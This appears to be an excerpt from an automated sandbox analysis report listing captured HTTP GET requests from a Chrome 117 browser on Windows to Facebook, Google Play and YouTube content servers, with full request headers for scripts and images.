    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /Y9BUoMIWfhZDUFZ_MxQmnsgSyb3O8s8Sds65E_j46-vdDSJi_0Xqmoa-fHaQa7fGlw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sqiP1qM7wG2bNZxazEogFapaGlhLWbYz_NI9BHCvNEe15mGtC0OYRQKYbdt_yD4pdSM=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iYwN4/yd/l/en_GB/lW1EzoN7_Oc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ijJ_4/yf/l/en_GB/BBd2uei_xHo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikpZ4/yJ/l/en_GB/GW1DkJBvUCz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /n9CeusCmd-m3uzx8dANuIBorYwG8L5ZbEdkYfVhIn5riLqMiviFPnEuzUveNXLdoVvew=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iLl54/yM/l/en_GB/uG4EfEPS4Rt.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/EIi3C0sPHQ2.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /4RtQ-xqvnSsLZhkVQFAc6qfC-JxyeH1iOm3r4GpAem9x6BhZTfX7CVreZtX1_cr9Sw=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/kqxAy363Pag/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /-kxC4InQ01s06oRPVdInILaIitVUs5QD4IFGAFeXWTR62gAF-BPJuhXZi_cPvVB13oE=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/aP5mQIXxLCE/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yP/r/ZQxGeuP1tWI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dl3h4f8JvKbmL4jtmqiTWof6bU6W2mKCzOmAHgdf0PUCanyZ0qQ19oXqRgn79R8qXKwV=w416-h235-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3mFQ9TxTUpICP96ePMtgZTMmwXdLmfh4LROdo2pJ-d-RU4NBZ6JnIWeVp92DgpqxgRMu=s64-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yY/r/pRN8RJz6VlO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/V5iPrLb12Rf.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iNig4/y7/l/en_GB/79SeOVWXEcm.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikpZ4/yJ/l/en_GB/GW1DkJBvUCz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iLl54/yM/l/en_GB/uG4EfEPS4Rt.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iOos4/yj/l/en_GB/kM7FcjXTwOM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iluz4/y2/l/en_GB/MvRHUS1G-cc.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iEm34/yf/l/en_GB/M9F-Jw7q3uo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yi/r/BLqydITNHiz.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yP/r/ZQxGeuP1tWI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iQbs4/yM/l/en_GB/5Tr2NIWNgxM.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3ikJE4/yM/l/en_GB/H9hFVb-Q8_Q.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iMyQ4/yx/l/en_GB/yUeQb7xXYnw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yY/r/pRN8RJz6VlO.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yC/r/V5iPrLb12Rf.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3iEm34/yf/l/en_GB/M9F-Jw7q3uo.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /c3SRuvi4eb82MzWlnUgy_xyUkCYF8MWFqol3ejyiMR17u1NnI1X0UHFNkLEjCgMT=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /gKIplvoQADvI0Q7JAS8sikxoB2QYPf4X1R9y7Gmv8epLYDiaqaisAk3qbb4XJY0BVrg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /3Fbi4a9x3z4i_xH8NrC_bSC2m3SPu7Bqj0pW68MHg6AoqCi-pfZLchig4c4DwPA-EGo=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /dsl4dYEQ0fnrjbXgqec7Efunr8PBCyraD7WXwOxMQzljHFCUU_wXwLEzyBxKOAanjw=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yD/r/BGMvuu7HwCF.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /uQ9hA-fPwMe3U8m0i1lqnLVLKObQWhygMvfHURGy-umOu6EJirFNDqFyiSSLfyb0KA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vi/KHfEG-2pIEI/hqdefault.jpg HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
